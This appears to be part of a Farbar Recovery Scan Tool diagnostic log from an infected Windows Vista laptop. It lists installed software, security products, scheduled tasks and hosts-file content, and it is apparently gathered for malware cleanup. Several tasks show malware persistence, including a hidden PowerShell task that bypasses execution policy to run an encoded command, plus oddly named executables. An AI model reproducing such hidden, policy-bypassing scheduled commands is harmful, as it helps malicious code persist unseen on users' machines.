2016-01-26 03:04 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\inf 2016-01-26 03:04 - 2006-11-02 08:33 - 00000000 ____D C:\Windows 2016-01-26 03:04 - 2006-11-02 07:46 - 00758862 _____ C:\Windows\system32\PerfStringBackup.INI 2016-01-26 02:57 - 2014-11-19 20:20 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2016-01-26 02:57 - 2006-11-02 10:42 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2016-01-26 02:57 - 2006-11-02 10:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0 2016-01-26 02:57 - 2006-11-02 10:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0 2016-01-24 03:48 - 2014-11-19 20:20 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2016-01-24 03:48 - 2006-11-02 10:42 - 00032544 _____ C:\Windows\Tasks\SCHEDLGU.TXT 2016-01-24 03:47 - 2015-01-19 10:44 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job 2016-01-23 18:07 - 2015-03-18 17:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverUpdate 2016-01-23 18:07 - 2014-12-15 16:45 - 00000000 ____D C:\Users\Barbara\AppData\Local\StormWatch 2016-01-23 18:07 - 2014-12-15 16:41 - 00000000 ____D C:\Users\Barbara\AppData\Local\FinanceAlert 2016-01-23 18:06 - 2014-12-15 16:39 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\ContentExplorer 2016-01-23 16:56 - 2015-03-18 17:46 - 00016152 _____ C:\Windows\system32\Drivers\SWDUMon.sys 2016-01-23 14:01 - 2015-03-17 13:00 - 00000370 _____ C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job 2016-01-21 12:18 - 2014-11-20 07:14 - 00001656 _____ C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job 2016-01-21 12:17 - 2014-11-20 07:14 - 00008002 _____ C:\Windows\System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A 2016-01-20 11:18 - 2015-01-19 10:44 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2016-01-20 
11:18 - 2015-01-19 10:44 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2016-01-20 11:18 - 2015-01-19 10:44 - 00003682 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater 2016-01-17 12:54 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\rescache 2016-01-17 12:34 - 2014-11-22 10:31 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight 2016-01-17 12:23 - 2014-11-18 01:10 - 00000000 ____D C:\Windows\SysWOW64\RTCOM 2016-01-17 12:06 - 2014-11-18 00:49 - 00000000 ____D C:\ProgramData\Microsoft Help 2016-01-17 12:05 - 2014-11-22 10:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2016-01-17 11:57 - 2014-11-18 20:12 - 00000000 ____D C:\Windows\system32\MRT 2016-01-17 11:50 - 2006-11-02 07:35 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe 2016-01-16 08:28 - 2006-11-02 10:21 - 00332240 _____ C:\Windows\system32\FNTCACHE.DAT 2016-01-16 07:56 - 2015-05-31 10:14 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2016-01-15 14:36 - 2015-11-20 18:46 - 00000000 ____D C:\Program Files\McAfee Security Scan 2016-01-01 18:32 - 2015-01-31 14:56 - 00000000 ____D C:\Users\Barbara\Desktop\Family Tree ==================== Files in the root of some directories ======= 2015-01-31 15:51 - 2015-07-22 17:07 - 0000240 _____ () C:\Users\Barbara\AppData\Roaming\wklnhst.dat 2014-11-18 18:24 - 2015-03-20 10:29 - 0000680 _____ () C:\Users\Barbara\AppData\Local\d3d9caps.dat 2014-12-15 16:46 - 2014-12-15 16:49 - 0004424 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistMSI1954.txt 2014-12-15 16:46 - 2014-12-15 16:46 - 0016288 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistUI1954.txt Some files in TEMP: ==================== C:\Users\Barbara\AppData\Local\Temp\exec.exe C:\Users\Barbara\AppData\Local\Temp\jre-8u31-windows-au.exe C:\Users\Barbara\AppData\Local\Temp\NullsoftHelper.dll C:\Users\Barbara\AppData\Local\Temp\uires.dll ==================== Bamital & 
volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-01-26 03:03

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:24-01-2016
Ran by Barbara (2016-01-26 03:07:15)
Running from C:\Users\Barbara\Desktop
Windows Vista Home Premium Service Pack 2 (X64) (2014-11-18 05:42:01)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3355649212-3080085010-2879840853-500 - Administrator - Disabled)
Barbara (S-1-5-21-3355649212-3080085010-2879840853-1000 - Administrator - Enabled) => C:\Users\Barbara
Guest (S-1-5-21-3355649212-3080085010-2879840853-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Out of date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AV: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {3A033352-45FD-579C-DF47-2D2DA7A56A3D}
AS: Microsoft Security Essentials (Enabled - Out of date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {8162D2B6-63C7-5812-E5F7-165FDC222080}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Reader 9.1 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Amazon Links (HKLM-x32\...\{224821ED-CADA-4A8A-AC8D-3734CC0F0931}) (Version: 1.0 - TOSHIBA Corporation)
ATI Catalyst Install Manager (HKLM\...\{190A60F1-2FEE-0A11-7D37-D8607809CC39}) (Version: 3.0.723.0 - ATI Technologies, Inc.)
Bing Bar (HKLM-x32\...\{449CE12D-E2C7-4B97-B19E-55D163EA9435}) (Version: 7.0.619.0 - Microsoft Corporation) ccc-core-static (x32 Version: 2009.0421.2132.36832 - ATI) Hidden Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation) Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.1.6) (Version: 5.0.1.6 - Coupons.com Incorporated) CyberLink PowerCinema for TOSHIBA (HKLM-x32\...\InstallShield_{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 6.0.2616a - CyberLink Corp.) D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Direct DiscRecorder (x32 Version: 1.00.0000 - Corel Corporation) Hidden Dolby Control Center (HKLM\...\{20387B45-18A4-4D48-ABD9-A23D2CBE42B3}) (Version: 2.2.1 - Dolby) DriverUpdate (HKLM-x32\...\{B2B04F8B-6444-4364-89C8-F3088D4E8D02}) (Version: 2.2.43335 - SlimWare Utilities, Inc.) DVD MovieFactory for TOSHIBA (HKLM-x32\...\InstallShield_{50F68032-B5B7-4513-9116-C978DBD8F27A}) (Version: 7.0.0 - Corel Corporation) DVD MovieFactory for TOSHIBA (x32 Version: 7.0.0 - Corel Corporation) Hidden Generations (HKLM-x32\...\{CB9EA6BB-B653-11D4-B6F6-00105A27284D}) (Version: - ) Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.) Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) 
Hidden Intel® PROSet/Wireless WiFi Software (HKLM\...\{F22FD942-651D-4EE8-BD6F-7E0AF5E17625}) (Version: 12.04.0000 - Intel Corporation) Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version: - Intel Corporation) Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation) Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Lexmark 3400 Series (HKLM\...\Lexmark 3400 Series) (Version: - Lexmark International, Inc.) Lexmark Toolbar (HKLM-x32\...\{1017A80C-6F09-4548-A84D-EDD6AC9525F0}) (Version: - ) LightScribe 1.4.124.1 (x32 Version: 1.4.124.1 - hxxp://www.lightscribe.com) Hidden Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes) McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.266.3 - McAfee, Inc.) McAfee Security Scan Plus (HKLM-x32\...\McAfee Security Scan) (Version: 3.11.163.2 - McAfee, Inc.) 
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden Messenger Companion (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation) Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation) Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft) Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation) Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation) Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation) Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) 
(Version: 9.7.0621 - Microsoft Corporation) Mozilla Firefox 43.0.4 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 43.0.4 (x86 en-US)) (Version: 43.0.4 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.4.5848 - Mozilla) MSXML 4.0 SP2 (KB941833) (HKLM-x32\...\{C523D256-313D-4866-B36A-F3DE528246EF}) (Version: 4.20.9849.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) MSXML 4.0 SP2 and SOAP Toolkit 3.0 (x32 Version: 1.0.0.0 - Webroot Software, Inc.) Hidden Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.) PlayReady PC runtime (HKLM\...\{704ABF63-B0B1-446B-9D92-C5D06AFCE7B6}) (Version: 1 - Microsoft Corporation) QuickBooks Financial Center (HKLM-x32\...\{890EF3F8-742F-46BD-9E8E-084B3A1F4364}) (Version: 1.10.0000 - Intuit Inc.) Realtek 8136 8168 8169 Ethernet Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0004 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5809 - Realtek Semiconductor Corp.) 
RICOH R5U230 Media Driver ver.2.02.02.01 (HKLM-x32\...\{022CBB38-CEF0-42BA-906A-A49BEFAE0BEE}) (Version: 2.02.02.01 - RICOH) Segoe UI (x32 Version: 15.4.2271.0615 - Microsoft Corp) Hidden Skins (x32 Version: 2009.0421.2132.36832 - ATI) Hidden Skype Launcher (HKLM-x32\...\{BF5A20B4-55F7-49B8-9302-FAC7C459AF3D}) (Version: 1.0 - TOSHIBA Corporation) Spy Sweeper Core (x32 Version: 4.4.0.85 - Webroot Software) Hidden Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 12.2.10.0 - Synaptics Incorporated) TOSHIBA Agreement Notification Utility (HKLM-x32\...\InstallShield_{83892653-9EB8-4192-803E-D987A85CDD23}) (Version: 1.0.11.0 - TOSHIBA Corporation) Toshiba Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.0.4 - Toshiba) TOSHIBA Assist (HKLM-x32\...\{1B87C40B-A60B-4EF3-9A68-706CF4B69978}) (Version: 3.00.08 - TOSHIBA) TOSHIBA ConfigFree (HKLM-x32\...\{F0A386D2-6E15-4A8F-A04E-87CE9BED0D48}) (Version: 7.4.8 - TOSHIBA Corporation) TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.0.1.3 for x64 - TOSHIBA Corporation) TOSHIBA DVD PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.00.1.04-A - TOSHIBA Corporation) TOSHIBA eco Utility (HKLM-x32\...\InstallShield_{B3FF1CD9-B2F0-4D71-BB55-5F580401C48E}) (Version: 1.0.2.64 - TOSHIBA Corporation) TOSHIBA Extended Tiles for Windows Mobility Center (HKLM-x32\...\InstallShield_{617C36FD-0CBE-4600-84B2-441CEB12FADF}) (Version: - ) TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.0.4.64 - TOSHIBA Corporation) TOSHIBA Hardware Setup (HKLM-x32\...\{D0387727-C89D-4774-B643-B9333EAA09DE}) (Version: 2.00.03 - TOSHIBA Corporation) TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.1.2.9 - TOSHIBA Corporation) TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.0.64.0 - TOSHIBA Corporation) 
TOSHIBA Internal Modem Region Select Utility (HKLM-x32\...\InstallShield_{89F7D66C-777D-473B-AA11-319C0F190EAC}) (Version: - ) Toshiba Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.001.0000 - Toshiba) TOSHIBA Recovery Disc Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.0.0.2 for x64 - TOSHIBA Corporation) Toshiba Registration (HKLM-x32\...\{C53D16CC-E56F-47B8-906E-70AAF8EABB4F}) (Version: 1.00.0000 - Datalode Inc.) Toshiba Resources Page (HKLM-x32\...\{21526716-DFD8-4B90-86D9-EF9F47057B3E}) (Version: 1.0.2.1 - TOSHIBA Corporation) TOSHIBA SD Memory Utilities (HKLM\...\{EBFF48F5-3CFA-436F-8FD5-94FB01D3A0A7}) (Version: 1.9.1.12 - TOSHIBA) TOSHIBA Software Modem (HKLM\...\TOSHIBA Software Modem) (Version: - Agere Systems) TOSHIBA Speech System Applications (HKLM-x32\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: - ) TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM-x32\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version: - ) TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM-x32\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version: - ) TOSHIBA Supervisor Password (HKLM-x32\...\{A208044D-A88B-4ACF-AE95-E4F213E6EDC0}) (Version: 2.00.02 - TOSHIBA Corporation) TOSHIBA USB Sleep and Charge Utility (HKLM-x32\...\{E487EE7D-EAAA-4E2A-9116-E3B477D8A74F}) (Version: 1.2.1.0 - TOSHIBA Corporation) TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.2.8.64 - TOSHIBA Corporation) TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.0.1.8 - TOSHIBA Corporation) Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft) Webroot AntiVirus with Spy Sweeper (HKLM-x32\...\{1FCC574F-AFA2-4432-9EF1-79CA7BA73431}_is1) (Version: 6.1 - Webroot Software, Inc.) 
WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.66 - WildTangent) Windows Driver Package - TOSHIBA (FwLnk) System (11/19/2006 1.0.0.3) (HKLM\...\D27D7E9318CFA89EDDE8D448B507A8EB725F5A52) (Version: 11/19/2006 1.0.0.3 - TOSHIBA) Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation) Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {0F85781D-2C97-4D9D-9632-7EFDBF2EB0A8} - \WebBarLaunchTask -> No File <==== ATTENTION Task: {11DD6B62-185E-4E63-8F45-4FFC691C9B06} - \WebBarUpdateTask -> No File <==== ATTENTION Task: {263A5680-836D-4B0F-BB3C-249E8B753F8E} - System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [2009-11-06] (Webroot Software, Inc.) 
Task: {360E6CE9-8445-48AB-A36D-4F5A65A97683} - \DriverUpdate Startup -> No File <==== ATTENTION Task: {3A51EE16-6E79-450D-A8FD-2A0BD34DFD95} - System32\Tasks\PubMach138 => C:\Users\Barbara\AppData\Local\RustiSens806\Rutransform.exe [2016-01-23] () Task: {4D77D01E-DB5F-4653-8377-E8C2AB310C52} - \Scheduled Update for Ask Toolbar -> No File <==== ATTENTION Task: {79092768-F5C7-4D08-B1B7-9C7A7A0F414F} - System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand 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 Task: {81FDB296-4C8A-4B83-A959-123B2D5E60D2} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto Task: {9858409A-6BF2-406E-B2D7-4793E237FFF1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {A4D38401-1428-46C7-AD2C-73A09F16C38F} - \DriverUpdate Scan -> No File <==== ATTENTION Task: {A5190072-4239-4907-9D98-7871BD0DDBB9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-20] (Adobe Systems Incorporated) Task: {AE8343D2-863F-44E2-8FAE-B123C5BA930C} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe Task: {B9545D91-42EE-4132-B2FA-A6D10D25BE8A} - \One System Care Task -> No File <==== ATTENTION Task: {BB42D120-21AC-4A10-8D46-C325D413A0DF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) 
Task: {C02F531F-476C-495D-BFA2-503EB2277BDB} - System32\Tasks\Brooucnejo => C:\ProgramData\Brooucnejo\1.0.7.1\semsikeh.exe Task: {DB208AD7-F908-420A-8C84-CB29D9D5AF30} - \One System Care Monitor -> No File <==== ATTENTION Task: {EA39D524-1CC9-4D84-86F5-6FC1F8939BAC} - \UpdateAdmin -> No File <==== ATTENTION Task: {FC491F5B-D745-4FC7-A39F-466825B5D486} - System32\Tasks\OutstandinDivisio6 => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe Task: {FF9497ED-7720-46DB-A12E-809C65F6789A} - \One System CarePeriod -> No File <==== ATTENTION (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\OutstandinDivisio6.job => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe Task: C:\Windows\Tasks\PubMach138.job => C:\Users\Barbara\AppData\Local\RUSTIS~1\Rutransform.exe Task: C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe Task: C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe>/ScheduleSweep=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A C:\BarbaraӖ眇扥潲瑯ӆTaskName=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A ApplicationName=C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) 
==================== Loaded Modules (Whitelisted) ============== 2007-09-06 12:27 - 2007-09-06 12:27 - 01331712 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll 2009-02-27 10:11 - 2009-02-27 10:11 - 00335360 _____ () C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL 2015-01-25 10:26 - 2006-01-12 09:24 - 00141312 _____ () C:\Windows\system32\spool\PRTPROCS\x64\lxcypp6c.dll 2014-11-18 01:04 - 2009-04-22 01:06 - 00120320 _____ () C:\Windows\system32\atitmm64.dll 2009-03-07 16:15 - 2009-03-07 16:15 - 06986552 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll 2008-07-14 13:35 - 2008-07-14 13:35 - 00107832 _____ () C:\Program Files\TOSHIBA\FlashCards\TWarnMsg\TWarnMsg.dll 2009-05-03 01:35 - 2007-04-23 11:09 - 00016896 _____ () C:\Program Files\TOSHIBA\Toshiba Assist\NotifyX.dll 2007-12-19 15:13 - 2007-12-19 15:13 - 00078848 _____ () C:\Program Files\TOSHIBA\HDD Protection\NotifyThp.dll 2009-03-12 22:08 - 2009-03-12 22:08 - 00048640 _____ () C:\Program Files (x86)\Toshiba\PCDiag\NotifyPCD.dll 2007-04-24 23:47 - 2007-04-24 23:47 - 00012288 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll 2009-02-10 14:32 - 2009-02-10 14:32 - 00076288 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll 2014-11-18 01:05 - 2014-11-18 01:05 - 00014848 _____ () C:\Windows\assembly\GAC_MSIL\AxInterop.WBOCXLib\1.0.0.0__90ba9c70f846762e\AxInterop.WBOCXLib.dll 2008-11-25 13:19 - 2008-11-25 13:19 - 01193472 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Implementation\64\wbocx.ocx 2009-01-30 13:41 - 2009-01-30 13:41 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll 2014-11-18 01:05 - 2014-11-18 01:05 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll 2009-02-16 19:09 - 2009-02-16 19:09 - 00868352 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for 
TOSHIBA\Kernel\CLML\CLMediaLibrary.dll 2009-02-16 19:09 - 2009-02-16 19:09 - 00007680 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvcPS.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WebrootSpySweeperService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WRConsumerService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WebrootSpySweeperService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRConsumerService => ""="Service" ==================== EXE Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2015-10-05 21:16 - 2015-11-14 11:49 - 00000030 ____A C:\Windows\system32\Drivers\etc\hosts 0.0.0.1 mssplus.mcafee.com ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\TOSHIBA-1.jpg DNS Servers: Media is not connected to internet. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1) Windows Firewall is enabled. 
